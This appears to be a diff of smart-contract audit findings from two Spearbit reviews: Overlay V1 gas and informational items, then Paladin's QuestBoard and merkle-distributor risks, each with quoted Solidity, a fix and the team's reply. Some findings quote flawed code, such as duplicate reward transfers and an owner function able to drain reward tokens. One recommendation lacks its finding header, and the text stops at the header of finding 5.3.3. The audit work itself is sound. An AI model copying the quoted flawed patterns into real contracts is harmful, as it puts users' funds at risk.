+5.4.13 Retrieve roles via constants in import Severity: Gas Optimization Context: OverlayV1Factory.sol#L117, OverlayV1Factory.sol#L156-L157, IOverlayV1Token.sol#L9-L15, OverlayV1Token.sol#L10-L21, AccessControl.sol#L57 Description: Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE and BURNER_ROLE are retrieved via an external function call. To save gas, they could also be retrieved as constants via an import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol which is the same as DEFAULT_ADMIN_ROLE of AccessControl.sol; this ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE.

 modifier onlyGovernor() {
-    require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), "OVLV1: !governor");
+    require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), "OVLV1: !governor");
     _;
 }
 ...
 function deployMarket(...) {
     ...
-    ovl.grantRole(ovl.MINTER_ROLE(), market_);
+    ovl.grantRole(MINTER_ROLE, market_);
-    ovl.grantRole(ovl.BURNER_ROLE(), market_);
+    ovl.grantRole(BURNER_ROLE, market_);
     ...
 }

Recommendation: Consider making the following changes:

IOverlayV1Token.sol:

+// Note: has to be outside the interface definition
+// Can use DEFAULT_ADMIN_ROLE from AccessControl.sol
+bytes32 constant MINTER_ROLE = keccak256("MINTER");
+bytes32 constant BURNER_ROLE = keccak256("BURNER");
+bytes32 constant GOVERNOR_ROLE = keccak256("GOVERNOR");
 interface IOverlayV1Token is IAccessControlEnumerable, IERC20 {
-    function ADMIN_ROLE() external view returns (bytes32);
-    function MINTER_ROLE() external view returns (bytes32);
-    function BURNER_ROLE() external view returns (bytes32);
-    function GOVERNOR_ROLE() external view returns (bytes32);
 }

OverlayV1Token.sol:

-bytes32 public constant ADMIN_ROLE = 0x00;
-bytes32 public constant MINTER_ROLE = keccak256("MINTER");
-bytes32 public constant BURNER_ROLE = keccak256("BURNER");
-bytes32 public constant GOVERNOR_ROLE = keccak256("GOVERNOR");
 constructor() {
-    _setupRole(ADMIN_ROLE, msg.sender);
+    _setupRole(DEFAULT_ADMIN_ROLE, msg.sender);
     ...
-    _setRoleAdmin(MINTER_ROLE, ADMIN_ROLE);
+    _setRoleAdmin(MINTER_ROLE, DEFAULT_ADMIN_ROLE);
-    _setRoleAdmin(BURNER_ROLE, ADMIN_ROLE);
+    _setRoleAdmin(BURNER_ROLE, DEFAULT_ADMIN_ROLE);
-    _setRoleAdmin(GOVERNOR_ROLE, ADMIN_ROLE);
+    _setRoleAdmin(GOVERNOR_ROLE, DEFAULT_ADMIN_ROLE);
 }

Overlay: Fixed in commit fa0f15c. Spearbit: Acknowledged.

5.5 Informational

+5.5.1 Double check action when snapAccumulator == 0 in transform() Severity: Informational Context: Roller.sol#L23-L78 Description: The function transform() checks for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0). A comment shows this is meant to prevent a division by 0 later on. The division is based on abs(snapAccumulator) + abs(value), so it will only fail when snapAccumulator == value == 0.

function transform(...) ... {
    ...
    int256 accumulatorNow = snapAccumulator + value;
    if (accumulatorNow == 0) {
        // if accumulator now is zero, windowNow is simply window
        // to avoid 0/0 case below   <-- this comment might not be accurate
        return ...
    }
    ...
    uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator)
    uint256 w2 = uint256(value >= 0 ? value : -value); // w2 = abs(value)
    uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0
    ...
}

Recommendation: Double-check that windowNow should indeed be reset to window when accumulatorNow == 0. Note: this seems logical, but isn't explicitly stated in the whitepaper. We recommend updating the comment. Overlay: Fixed in 1ea0df. Spearbit: Acknowledged.

+5.5.2 Add unchecked in natural log (ln) function or remove the functions Severity: Informational Context: LogExpMath.sol#L297-L334 Description: The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() is used, so they could also be deleted.

function log(int256 arg, int256 base) internal pure returns (int256) {
    unchecked { ... }
}
function ln(int256 a) internal pure returns (int256) {
    // no unchecked
}

Recommendation: Consider removing the unused functions. Otherwise, consider adding unchecked to function ln() to make it equivalent to all the other functions. Overlay: Fixed in commit 57b9bd6. Spearbit: Acknowledged.

+5.5.3 Specialized functions for the long and short side Severity: Informational Context: OverlayV1Market.sol#L145-L427 Description: The functions build(), unwind() and liquidate() contain a large percentage of code that differs between the long and the short side. Recommendation: Consider creating specialized functions for the long and short side, which might make the code easier to read. Overlay: Did not implement this, due to contract size issues. Spearbit: Acknowledged.

+5.5.4 Beware of chain dependencies Severity: Informational Context: OverlayV1Market.sol#L25, OverlayV1UniswapV3Feed.sol#L14 Description: The contracts have a few dependencies/assumptions which aren't future-proof and/or limit on which chains the code can be deployed. The AVERAGE_BLOCK_TIME differs across EVM-based chains; on the Ethereum mainchain, it will change to 12 seconds after the merge.

contract OverlayV1Market is IOverlayV1Market {
    ...
    uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof
    ...
}

WETH addresses are not the same on different chains; see Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH.

contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed {
    address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    ...
}

Recommendation: Consider making the block time a configurable parameter, initially set via the constructor of OverlayV1Market. Additionally, consider supplying the WETH address as a parameter to the constructor of OverlayV1UniswapV3Feed.sol. Overlay: Fixed AVERAGE_BLOCK_TIME to be a params[] element in 2bb8552. Will tackle the WETH hard-code in the feed flattening rewrite. Spearbit: Acknowledged.
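A sketch of the parameterized approach (the wiring is illustrative, not the actual Overlay constructors):

contract OverlayV1MarketSketch {
    // Deployment-time configuration instead of a hard-coded constant.
    uint256 public immutable averageBlockTime;

    constructor(uint256 _averageBlockTime) {
        averageBlockTime = _averageBlockTime; // e.g. 14 pre-merge, 12 post-merge, chain-specific elsewhere
    }
}

contract OverlayV1UniswapV3FeedSketch {
    // Per-chain wrapped-native-token address instead of a mainnet constant.
    address public immutable weth;

    constructor(address _weth) {
        weth = _weth;
    }
}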
+5.5.5 Move _registerMint() closer to mint() and burn() Severity: Informational Context: OverlayV1Market.sol#L240-L427 Description: Within the functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However, these are quite a few lines apart, so it is not immediately obvious that they are related and operate on the same values. Additionally, _registerMint() also registers burns.

function unwind(...) ... {
    ...
    _registerMint(int256(value) - int256(cost));
    ... // 40 lines of code
    if (value >= cost) {
        ovl.mint(address(this), value - cost);
    } else {
        ovl.burn(cost - value);
    }
    ...
}

function liquidate(address owner, uint256 positionId) external {
    ...
    _registerMint(int256(value) - int256(cost));
    ... // 33 lines of code
    ovl.burn(cost - value);
    ...
}

Recommendation: Rename _registerMint() to _registerMintAndBurn() and add a comment to _registerMintAndBurn() indicating that a negative value means a burn. Move the call to _registerMint() close to the ovl.mint() and ovl.burn() calls in the source, or possibly move the ovl.mint() and ovl.burn() calls into _registerMint(), which lowers the chance of mistakes. Nevertheless, and as indicated by the Overlay team, these changes could make the code harder to understand. Overlay: Fixed in commit 4894368. Spearbit: Acknowledged.

+5.5.6 Use of Math.min() is error-prone Severity: Informational Context: OverlayV1Market.sol, Position.sol Description: The function Math.min() is used in two ways: • To get the smallest of two values, e.g. x = Math.min(x,y); • To make sure the resulting value is >= 0, e.g. x -= Math.min(x,y); (note the extra - in -=). It is easy to make a mistake because the two constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values:

OverlayV1Market.sol: tradingFee = Math.min(tradingFee, value);
OverlayV1Market.sol: cap = Math.min(cap, circuitBreaker(snapshot, cap));
OverlayV1Market.sol: cap = Math.min(cap, backRunBound(data));

Examples to make sure the resulting value is >= 0:

OverlayV1Market.sol: oiLong -= Math.min(oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide));
OverlayV1Market.sol: oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction));
OverlayV1Market.sol: oiShort -= Math.min(oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide));
OverlayV1Market.sol: oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction));
OverlayV1Market.sol: pos.notional -= uint120(Math.min(pos.notional, pos.notionalInitial(fraction)));
OverlayV1Market.sol: pos.debt -= uint120(Math.min(pos.debt, pos.debtCurrent(fraction)));
OverlayV1Market.sol: pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction));
OverlayV1Market.sol: oiLong -= Math.min(oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide));
OverlayV1Market.sol: oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction));
OverlayV1Market.sol: oiShort -= Math.min(oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide));
OverlayV1Market.sol: oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction));
Position.sol: posCost -= Math.min(posCost, posDebt);

Recommendation: Consider using the following:

function minfloor(uint256 a, uint256 b) internal pure returns (uint256) {
    return a > b ? a - b : 0;
}

Then you can do something like the example below, which also makes the code easier to read:

-oiLong -= Math.min(oiLong, ... )
+oiLong  = minfloor(oiLong, ... )

Overlay: Fixed in commit ad4d1ec. Spearbit: Acknowledged.
+5.5.7 Confusing use of term burn Severity: Informational Context: OverlayV1Market.sol#L510-L533 Description: The function oiAfterFunding() contains a comment saying that it burns a portion of the contracts. The term burn can be confused with the burning of OVL. The Overlay team clarified that the total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding; there is no actual burning of OVL.

function oiAfterFunding(...) ... {
    ...
    // Burn portion of all aggregate contracts (i.e. oiLong + oiShort)
    // to compensate protocol for pro-rata share of imbalance liability
    ...
    return (oiOverweightNow, oiUnderweightNow);
}

Recommendation: Update the comments. Overlay: Fixed in commit dae3b82. Spearbit: Acknowledged.

+5.5.8 Document precondition for oiAfterFunding() Severity: Informational Context: OverlayV1Market.sol#L488-L494 Description: Function oiAfterFunding contains the following statement:

uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore;

If oiOverweightBefore < oiUnderweightBefore, this statement will revert. Luckily, the update() function makes sure this isn't the case.

function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... {
    ...
    uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // could revert if oiOverweightBefore < oiUnderweightBefore
    ...
}

function update() public returns (Oracle.Data memory) {
    ...
    bool isLongOverweight = oiLong > oiShort;
    uint256 oiOverweight = isLongOverweight ? oiLong : oiShort;   // oiOverweight is the largest of the two
    uint256 oiUnderweight = isLongOverweight ? oiShort : oiLong;  // oiUnderweight is the smallest of the two
    (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...);
    ...
}

Recommendation: Document the precondition for function oiAfterFunding(), e.g. that the value of oiOverweightBefore must be >= oiUnderweightBefore. Overlay: Fixed in commit 95e92fe. Spearbit: Acknowledged.
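A sketch of the suggested documentation (the wording is ours):

/// @dev Precondition: oiOverweightBefore >= oiUnderweightBefore. Otherwise
///      the subtraction computing oiImbalanceBefore underflows and reverts.
///      update() guarantees this by always passing max(oiLong, oiShort) as
///      the first argument.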
Recommendation: Consider formatting the numbers as follows:

OverlayV1Factory.sol:

+// Note: 1 bps = 1e14
-uint256 public constant MIN_LMBDA = 1e16; // 0.01
+uint256 public constant MIN_LMBDA = 0.01e18; // 0.01
-uint256 public constant MAX_LMBDA = 1e19; // 10
+uint256 public constant MAX_LMBDA = 10e18; // 10
-uint256 public constant MAX_DELTA = 2e16; // 2% (200 bps)
+uint256 public constant MAX_DELTA = 200e14; // 2% (200 bps)
-uint256 public constant MAX_CAP_PAYOFF = 1e19; // 10x
+uint256 public constant MAX_CAP_PAYOFF = 10e18; // 10x
-uint256 public constant MAX_CAP_NOTIONAL = 8e24; // 8,000,000 OVL (initial supply)
+uint256 public constant MAX_CAP_NOTIONAL = 8_000_000e18; // 8,000,000 OVL (initial supply)
-uint256 public constant MAX_CAP_LEVERAGE = 2e19; // 20x
+uint256 public constant MAX_CAP_LEVERAGE = 20e18; // 20x
-uint256 public constant MAX_CIRCUIT_BREAKER_MINT_TARGET = 8e24; // 8,000,000 OVL
+uint256 public constant MAX_CIRCUIT_BREAKER_MINT_TARGET = 8_000_000e18; // 8,000,000 OVL
-uint256 public constant MIN_MAINTENANCE_MARGIN_FRACTION = 1e16; // 1%
+uint256 public constant MIN_MAINTENANCE_MARGIN_FRACTION = 0.01e18; // 1%
-uint256 public constant MAX_MAINTENANCE_MARGIN_FRACTION = 2e17; // 20%
+uint256 public constant MAX_MAINTENANCE_MARGIN_FRACTION = 0.20e18; // 20%
-uint256 public constant MIN_MAINTENANCE_MARGIN_BURN_RATE = 1e16; // 1%
+uint256 public constant MIN_MAINTENANCE_MARGIN_BURN_RATE = 0.01e18; // 1%
-uint256 public constant MAX_MAINTENANCE_MARGIN_BURN_RATE = 5e17; // 50%
+uint256 public constant MAX_MAINTENANCE_MARGIN_BURN_RATE = 0.50e18; // 50%
-uint256 public constant MIN_LIQUIDATION_FEE_RATE = 1e15; // 0.10% (10 bps)
+uint256 public constant MIN_LIQUIDATION_FEE_RATE = 10e14; // 0.10% (10 bps)
-uint256 public constant MAX_LIQUIDATION_FEE_RATE = 1e17; // 10.00% (1000 bps)
+uint256 public constant MAX_LIQUIDATION_FEE_RATE = 1_000e14; // 10.00% (1000 bps)
-uint256 public constant MAX_TRADING_FEE_RATE = 3e15; // 0.30% (30 bps)
+uint256 public constant MAX_TRADING_FEE_RATE = 30e14; // 0.30% (30 bps)
-uint256 public constant MIN_MINIMUM_COLLATERAL = 1e12; // 1e-6 OVL
+uint256 public constant MIN_MINIMUM_COLLATERAL = 0.000_001e18; // 1e-6 OVL
-uint256 public constant MIN_PRICE_DRIFT_UPPER_LIMIT = 1e12; // 0.01 bps/s
+uint256 public constant MIN_PRICE_DRIFT_UPPER_LIMIT = 0.01e14; // 0.01 bps/s

Overlay: Fixed in commit a82ddd7. Spearbit: Acknowledged.

diff --git a/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt new file mode 100644 index 0000000..86b8016 --- /dev/null +++ b/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt @@ -0,0 +1,48 @@

+5.1.1 Verify user has indeed voted Severity: High Risk Context: MultiMerkleDistributor.sol Description: If an error is made in the merkle trees (either by accident or on purpose), a user that did not vote (in that period, for that gauge) might get rewards assigned to them. Although the Paladin documentation says "the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high. Recommendation: Check that a user has voted by interrogating the gauge contracts at reward retrieval time. Paladin: We carefully considered this issue during the development cycle, and the main argument against the recommendation is as follows: if users want to pile up rewards in order to claim them all at once (e.g. because of gas fees), then the only vote we can fetch from the Curve Gauge Controller is the last vote from the user, since the previous ones were removed and no checkpoints of past votes exist in the Gauge Controller. That would mean users' past claims would be locked and never claimed. Because of that, we are trying to have the most trustworthy MerkleTree generation, so this type of issue does not appear. Spearbit: Acknowledged; the recommendation was not implemented, therefore the risk still exists.
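For reference, a sketch of what such an on-chain check could look like. The getter names are assumed from the Curve GaugeController Vyper source (last_user_vote[user][gauge] stores the timestamp of the user's last vote), and the sketch inherits exactly the limitation Paladin describes, since only the last vote is observable:

interface IGaugeController {
    // Auto-generated getter for Curve's public last_user_vote mapping (assumed).
    function last_user_vote(address user, address gauge) external view returns (uint256);
}

library VoteCheck {
    // True iff the user's most recent vote for this gauge happened at or
    // after periodStart; earlier votes are not recoverable on-chain.
    function userVotedSince(IGaugeController gc, address user, address gauge, uint256 periodStart)
        internal view returns (bool)
    {
        return gc.last_user_vote(user, gauge) >= periodStart;
    }
}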
+5.1.2 Tokens could be sent / withdrawn multiple times by accident Severity: High Risk Context: QuestBoard.sol#L678-L815 Description: The functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but interfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the quests in that period, as closeQuestPeriod() only checks the state of the first quest. 2. Suppose you have closed the second quest of a period via closePartOfQuestPeriod(), but closeQuestPeriod() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor a second time. Also, closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally, there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues in future code changes.

function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant {
    ...
    // We use the 1st QuestPeriod of this period to check it was not Closed
    uint256[] memory questsForPeriod = questsByPeriod[period];
    require(
        periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period
        "QuestBoard: Period already closed"
    );
    ...
    // no further checks on currentState
    _questPeriod.withdrawableAmount = ....; // sets withdrawableAmount (again)
    IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again)
    ...
}

function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant {
    ...
    _questPeriod.currentState = PeriodState.CLOSED;
    ...
    _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount;
    IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount);
    ...
}

Note: Set to high risk because the likelihood of this happening is medium, but the impact is high. Recommendation: Let closeQuestPeriod() call closePartOfQuestPeriod(). Make closePartOfQuestPeriod() more robust by: • Checking the status of each period. • Skipping the already closed periods. Paladin: Implemented in #9. Spearbit: Acknowledged.
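One possible shape for the recommendation, sketched with names and fields paraphrased from the report (not the actual Paladin fix): both entry points share a single internal routine that checks and skips already-closed quest periods, so rewards can never be transferred twice.

// Returns true if this quest period was closed by this call, false if it
// was already closed (and was therefore skipped).
function _closeQuestPeriod(uint256 questID, uint256 period) internal returns (bool) {
    QuestPeriod storage _questPeriod = periodsByQuest[questID][period];
    if (_questPeriod.currentState != PeriodState.ACTIVE) return false; // skip: already closed
    _questPeriod.currentState = PeriodState.CLOSED;
    // ... compute toDistributeAmount, set withdrawableAmount exactly once,
    // and transfer the rewards to the distributor exactly once ...
    return true;
}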
Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], "QuestBoard: Cannot recover whitelisted token"); IERC20(token).safeTransfer(owner(), amount); return true; } } Recommendation: Prevent the retrieval of legitimate tokens. Because it is not possible to enumerate questRe- wardToken[] to identify legitimate tokens, an extra data structure is needed. Also be aware of dual entry point tokens. Paladin: Implemented in #16. Spearbit: Acknowledged. +5.2.2 Updating QuestBoard in MultiMerkleDistributor.sol will not work Severity: Medium Risk Context: MultiMerkleDistributor.sol#L285-L287 Description: Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; } Recommendation: Confirm the usefulness of updating the QuestManager/ QuestBoard. relevant, adapt QuestBoard.sol to start with a higher value for nextID. If this functionality is Paladin: The QuestBoard should be unique (only replaced if the GaugeController is replaced or in case of a bug requiring to kill the contract), while the Distributor could be replaced to propose new ways to redeem the reward tokens. QuestBoard is now immutable, therefore this method is not needed anymore. Implemented in #16. Spearbit: Acknowledged. 7 +5.2.3 Old quests can be extended via increaseQuestDuration() Severity: Medium Risk Context: QuestBoard.sol#L380-L438 Description: Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... } Recommendation: Determine what the actions should be when the quest is in the past. Paladin: We check that when calling the function, the current period is either the last period of the Quest, or before that last period. If not, the Quest is over, and we revert. Implemented in #8. Spearbit: Acknowledged. 
+5.2.4 Accidental call of addQuest could block contracts Severity: Medium Risk Context: MultiMerkleDistributor.sol#L240, QuestBoard.sol#L276-L369 Description: The addQuest() function uses an onlyAllowed access control modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), "QuestBoard: Fail add to Distributor"); ... ,! } 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), "MultiMerkle: Quest already listed"); require(token != address(0), "MultiMerkle: Incorrect reward token"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: Replace the modifier on addQuest() to a modifier like onlyQuestBoard(): modifier onlyQuestBoard(){ require(msg.sender == questBoard, "MultiMerkle: Not allowed"); _; } Paladin: Choice to put only a require instead of a 1 time use modifier. Implemented in #5. Spearbit: Acknowledged. +5.2.5 Reduce impact of emergencyUpdatequestPeriod() Severity: Medium Risk Context: MultiMerkleDistributor.sol#L311-L322 Description: Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: • Someone who has already claimed might be able to claim again. • Someone who has already claimed has too much. • Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. • someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: The following steps can be taken to reduce the impact: • Only allow an update if no claims have been done yet, by checking no bits have been set yet. However this has limited use. 9 • Make sure the index number of a user always stays the same, although this doesn’t help if the user is entitled to an higher amount. • Exclude already claimed tokens from the new merkle tree. 
To prevent claims in the meantime, it might be a good idea to pause claiming while the new tree is prepared, and reset all the bits after the update.
• Consider storing how much each account has claimed and allow the account to claim less on future claims, in case the account has claimed too much. However this requires some complicated logic.
Note: The contract needs to store the size of the merkle tree (e.g. the largest index) to be able to check/reset all the bits.
Paladin: In the case where a new amount of tokens is transferred to the contract to cover losses from wrongly calculated claims, we might need to change that amount to allow them to claim. Added a parameter addedRewards to increase questRewardsPerPeriod, but never decrease it. Implemented in #16.
Explanation for the emergency update procedure:
1. Block claims for the Quest period by using this method to set an incorrect MerkleRoot, where no proof matches the root.
2. Prepare a new Merkle Tree, taking into account previous user claims on that period and missing/overpaid rewards.
a) For all new claims to be added, set them after the last index of the previous Merkle Tree.
b) For users that did not claim, keep the same index and adjust the amount to be claimed if needed.
c) For indexes that were claimed, place an empty node in the Merkle Tree (with an amount of 0 & the address 0xdead as the account).
3. Update the Quest period with the correct MerkleRoot (no need to change the Bitmap, as the new MerkleTree will account for the indexes already claimed).
Spearbit: Acknowledged. Implemented in part technically and procedurally.

+5.2.6 Verify the correct merkle tree is used
Severity: Medium Risk
Context: MultiMerkleDistributor.sol#L260-L275, balance-tree.ts#L30-L35, MultiMerkleDistributor.sol#L126-L144
Description: The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed.
Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.
Recommendation: A solution which does not cost any extra storage but requires a small amount of gas involves adding questID and period to the merkle tree nodes, assuring rewards can only be claimed in combination with the right questID and period.

balance-tree.ts:

  // keccak256(abi.encode(index, account, amount))
  public static toNode(index: number | BigNumber, account: string, amount: BigNumber): Buffer {
    return Buffer.from(
-     utils.solidityKeccak256(['uint256', 'address', 'uint256'], [index, account, amount]).substr(2),
+     utils.solidityKeccak256(['uint256', 'uint256', 'uint256', 'address', 'uint256'],
+       [questID, period, index, account, amount]).substr(2),
      'hex'
    )
  }

MultiMerkleDistributor.sol:

  function claim(uint256 questID, uint256 period, uint256 index, address account, uint256 amount, ...) public {
      ...
      // Check that the given parameters match the given Proof
-     bytes32 node = keccak256(abi.encodePacked(index, account, amount));
+     bytes32 node = keccak256(abi.encodePacked(questID, period, index, account, amount));
      ...
  }

Paladin: Implemented in #12.
Spearbit: Acknowledged.

+5.2.7 Prevent mixing rewards from different quests and periods
Severity: Medium Risk
Context: MultiMerkleDistributor.sol#L260-L275
Description: The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree is equal to the rewards allocated for that quest and for that period.
This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will cause problems later on, when claims are done for the other quests/periods.
Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.
Recommendation: Consider making token buckets per quest (or even per period) in the MultiMerkleDistributor contract.
Paladin: Implemented in #16.
Spearbit: Acknowledged.

5.3 Low Risk

+5.3.1 Nonexistent zero address check for newQuestBoard in updateQuestManager function
Severity: Low Risk
Context: MultiMerkleDistributor.sol#L285-L287
Description: There is no zero address check for newQuestBoard in the updateQuestManager function. Assigning newQuestBoard to the zero address may cause unintended behavior.
Recommendation: Introduce a zero address check.

  function updateQuestManager(address newQuestBoard) external onlyOwner {
+     require(newQuestBoard != address(0), "newQuestBoard: Zero Address");
      questBoard = newQuestBoard;
  }

Paladin: Implemented in #16.
Spearbit: Acknowledged.

+5.3.2 Verify period is always a multiple of week
Severity: Low Risk
Context: QuestBoard.sol#L201-L203, QuestBoard.sol#L678-L742, QuestBoard.sol#L750-L815, QuestBoard.sol#L843-L845, QuestBoard.sol#L854-L863, MultiMerkleDistributor.sol#L126-L144, MultiMerkleDistributor.sol#L185-L216, MultiMerkleDistributor.sol#L260-L275, MultiMerkleDistributor.sol#L311-L322
Description: The calculations with period assume that period is a multiple of WEEK. However, period is often passed in as a parameter and it is not verified that it is a multiple of WEEK. This may cause unexpected results.
Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified:

- uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK;
+ uint256 nextPeriod = period + WEEK;

The following functions do not explicitly verify that period is a multiple of WEEK.

function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant {
    ...
    uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK;
    ...
}
function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... }
function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... }
function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... }
function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... }
function claim(..., uint256 period, ...) public { ... }
function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... }
function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... }
function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external {
    ... // also uses period as part of the claims array
    require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, "MultiMerkle: not updated yet");
    require(!isClaimed(questID, claims[i].period, claims[i].index), "MultiMerkle: already claimed");
    ...
    require(
        MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], node),
        "MultiMerkle: Invalid proof"
    );
    ...
    _setClaimed(questID, claims[i].period, claims[i].index);
    ...
    emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account);
    ...
}

Recommendation: Consider ensuring that period is a multiple of WEEK.
This can be achieved in the following way:

uint256 period = (period / WEEK) * WEEK;

If this is done everywhere then consider making this change:

- ((period + WEEK) / WEEK) * WEEK;
+ period + WEEK;

Paladin: Implemented in #13. Changes not made for the claim methods, as this type of issue where period is incorrect will be handled by changes made in #7.
Spearbit: Acknowledged.

+5.3.3 Missing safety check to ensure array length does not underflow and revert
Severity: Low Risk
